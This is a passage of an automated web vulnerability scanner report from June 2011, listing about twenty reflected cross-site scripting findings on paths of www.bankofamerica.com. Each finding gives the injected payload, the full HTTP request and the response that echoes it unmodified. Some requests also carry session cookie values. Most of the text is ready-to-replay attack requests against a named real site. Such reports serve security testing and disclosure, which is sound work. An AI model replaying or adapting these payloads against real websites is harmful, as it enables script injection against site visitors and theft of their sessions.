}
</script>
...[SNIP]...

1.340. http://www.bankofamerica.com/creditcards/index.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /creditcards/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcca1"><script>alert(1)</script>69af72e50f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /creditcardsbcca1"><script>alert(1)</script>69af72e50f4/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 29 Jun 2011 12:35:02 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=2957424299.20480.0000; path=/


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/creditcardsbcca1"><script>alert(1)</script>69af72e50f4/index.cfm">
...[SNIP]...

1.341. http://www.bankofamerica.com/deposits/checksave/index.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /deposits/checksave/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c81c"><script>alert(1)</script>cead96a045a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /deposits6c81c"><script>alert(1)</script>cead96a045a/checksave/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 29 Jun 2011 12:34:53 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/deposits6c81c"><script>alert(1)</script>cead96a045a/checksave/index.cfm">
...[SNIP]...

1.342. http://www.bankofamerica.com/deposits/checksave/index.cfm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /deposits/checksave/index.cfm

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17045"><script>alert(1)</script>8668a5d0148 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /deposits/checksave17045"><script>alert(1)</script>8668a5d0148/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 29 Jun 2011 12:34:54 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/deposits/checksave17045"><script>alert(1)</script>8668a5d0148/index.cfm">
...[SNIP]...

1.343. http://www.bankofamerica.com/findit/locator.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /findit/locator.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d95f8"><script>alert(1)</script>60e86b8784a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /finditd95f8"><script>alert(1)</script>60e86b8784a/locator.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 29 Jun 2011 12:35:08 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=524727979.20480.0000; path=/


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/finditd95f8"><script>alert(1)</script>60e86b8784a/locator.cfm">
...[SNIP]...

1.344. http://www.bankofamerica.com/help/equalhousing.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /help/equalhousing.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d62e"><script>alert(1)</script>a0ec9a11e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /help8d62e"><script>alert(1)</script>a0ec9a11e3/equalhousing.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 29 Jun 2011 12:34:41 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/help8d62e"><script>alert(1)</script>a0ec9a11e3/equalhousing.cfm">
...[SNIP]...

1.345. http://www.bankofamerica.com/help/equalhousing_popup.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /help/equalhousing_popup.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8969"><script>alert(1)</script>37fb46b0e2f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /helpd8969"><script>alert(1)</script>37fb46b0e2f/equalhousing_popup.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 29 Jun 2011 12:34:43 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/helpd8969"><script>alert(1)</script>37fb46b0e2f/equalhousing_popup.cfm">
...[SNIP]...

1.346. http://www.bankofamerica.com/help/index.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /help/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd4c4"><script>alert(1)</script>de873ba9ed3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /helpbd4c4"><script>alert(1)</script>de873ba9ed3/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 29 Jun 2011 12:34:40 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/helpbd4c4"><script>alert(1)</script>de873ba9ed3/index.cfm">
...[SNIP]...

1.347. http://www.bankofamerica.com/onlinebanking/enroll.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /onlinebanking/enroll.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c59b"><script>alert(1)</script>78b55eef1c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /onlinebanking2c59b"><script>alert(1)</script>78b55eef1c2/enroll.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 29 Jun 2011 12:34:50 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/onlinebanking2c59b"><script>alert(1)</script>78b55eef1c2/enroll.cfm">
...[SNIP]...

1.348. http://www.bankofamerica.com/onlinebanking/index.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /onlinebanking/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d26d"><script>alert(1)</script>624babdca3f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /onlinebanking9d26d"><script>alert(1)</script>624babdca3f/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 29 Jun 2011 12:34:47 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/onlinebanking9d26d"><script>alert(1)</script>624babdca3f/index.cfm">
...[SNIP]...

1.349. http://www.bankofamerica.com/pap/index.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /pap/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8a18"><script>alert(1)</script>8a66c0f4898 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pape8a18"><script>alert(1)</script>8a66c0f4898/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 29 Jun 2011 12:35:00 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/pape8a18"><script>alert(1)</script>8a66c0f4898/index.cfm">
...[SNIP]...

1.350. http://www.bankofamerica.com/promos/jump/ktc/index.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /promos/jump/ktc/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad03e"><script>alert(1)</script>96492e5ea79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /promosad03e"><script>alert(1)</script>96492e5ea79/jump/ktc/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 29 Jun 2011 12:49:02 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/promosad03e"><script>alert(1)</script>96492e5ea79/jump/ktc/index.cfm">
...[SNIP]...

1.351. http://www.bankofamerica.com/promos/jump/ktc/index.cfm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /promos/jump/ktc/index.cfm

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a437e"><script>alert(1)</script>fe074e1b952 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /promos/jumpa437e"><script>alert(1)</script>fe074e1b952/ktc/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 29 Jun 2011 12:49:03 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/promos/jumpa437e"><script>alert(1)</script>fe074e1b952/ktc/index.cfm">
...[SNIP]...

1.352. http://www.bankofamerica.com/promos/jump/ktc/index.cfm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /promos/jump/ktc/index.cfm

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c613"><script>alert(1)</script>5d17f073b72 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /promos/jump/ktc4c613"><script>alert(1)</script>5d17f073b72/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 29 Jun 2011 12:49:03 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/promos/jump/ktc4c613"><script>alert(1)</script>5d17f073b72/index.cfm">
...[SNIP]...

1.353. http://www.bankofamerica.com/promos/jump/ktc_coinjar/index.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /promos/jump/ktc_coinjar/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5eb76"><script>alert(1)</script>06a146e91f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /promos5eb76"><script>alert(1)</script>06a146e91f8/jump/ktc_coinjar/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 29 Jun 2011 12:35:07 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=809940651.20480.0000; path=/


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/promos5eb76"><script>alert(1)</script>06a146e91f8/jump/ktc_coinjar/index.cfm">
...[SNIP]...

1.354. http://www.bankofamerica.com/promos/jump/ktc_coinjar/index.cfm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /promos/jump/ktc_coinjar/index.cfm

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a105b"><script>alert(1)</script>92a7bd868ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /promos/jumpa105b"><script>alert(1)</script>92a7bd868ab/ktc_coinjar/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 29 Jun 2011 12:35:08 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=1598469803.20480.0000; path=/


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/promos/jumpa105b"><script>alert(1)</script>92a7bd868ab/ktc_coinjar/index.cfm">
...[SNIP]...

1.355. http://www.bankofamerica.com/promos/jump/ktc_coinjar/index.cfm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /promos/jump/ktc_coinjar/index.cfm

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b820"><script>alert(1)</script>0765db4fa30 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /promos/jump/ktc_coinjar6b820"><script>alert(1)</script>0765db4fa30/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 29 Jun 2011 12:35:08 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=1699133099.20480.0000; path=/


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/promos/jump/ktc_coinjar6b820"><script>alert(1)</script>0765db4fa30/index.cfm">
...[SNIP]...

1.356. http://www.bankofamerica.com/small_business/business_financing/index.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /small_business/business_financing/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8a0b"><script>alert(1)</script>a3d274c1bbe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /small_businessf8a0b"><script>alert(1)</script>a3d274c1bbe/business_financing/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 29 Jun 2011 12:35:27 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/small_businessf8a0b"><script>alert(1)</script>a3d274c1bbe/business_financing/index.cfm">
...[SNIP]...

1.357. http://www.bankofamerica.com/small_business/business_financing/index.cfm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /small_business/business_financing/index.cfm

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4d61"><script>alert(1)</script>450f863f051 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /small_business/business_financinge4d61"><script>alert(1)</script>450f863f051/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 29 Jun 2011 12:35:29 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/small_business/business_financinge4d61"><script>alert(1)</script>450f863f051/index.cfm">
...[SNIP]...

1.358. http://www.bankofamerica.com/studentbanking/index.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /studentbanking/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3063f"><script>alert(1)</script>0baf63b521e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /studentbanking3063f"><script>alert(1)</script>0baf63b521e/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 29 Jun 2011 12:34:57 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/studentbanking3063f"><script>alert(1)</script>0baf63b521e/index.cfm">
...[SNIP]...

1.359. http://www.bankofamerica.com/surveys/bridge/surveybridge.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /surveys/bridge/surveybridge.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12dd0"><script>alert(1)</script>a01f5a16cdc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /surveys12dd0"><script>alert(1)</script>a01f5a16cdc/bridge/surveybridge.cfm?surveynumber=9 HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; BOFA_LOCALE_COOKIE=en-US; cmRS=t3=1309270224924&pi=homepage%3AContent%3APersonal%3Bhome_personal; BIGipServerngen-www.80=916895403.20480.0000; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296076997

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 28 Jun 2011 21:21:44 GMT
Content-type: text/html
Page-Completion-Status: Normal
Content-Length: 1409


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/surveys12dd0"><script>alert(1)</script>a01f5a16cdc/bridge/surveybridge.cfmsurveynumber=9">
...[SNIP]...

1.360. http://www.bankofamerica.com/surveys/bridge/surveybridge.cfm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /surveys/bridge/surveybridge.cfm

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e738"><script>alert(1)</script>9ea3cf807cd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /surveys/bridge8e738"><script>alert(1)</script>9ea3cf807cd/surveybridge.cfm?surveynumber=9 HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
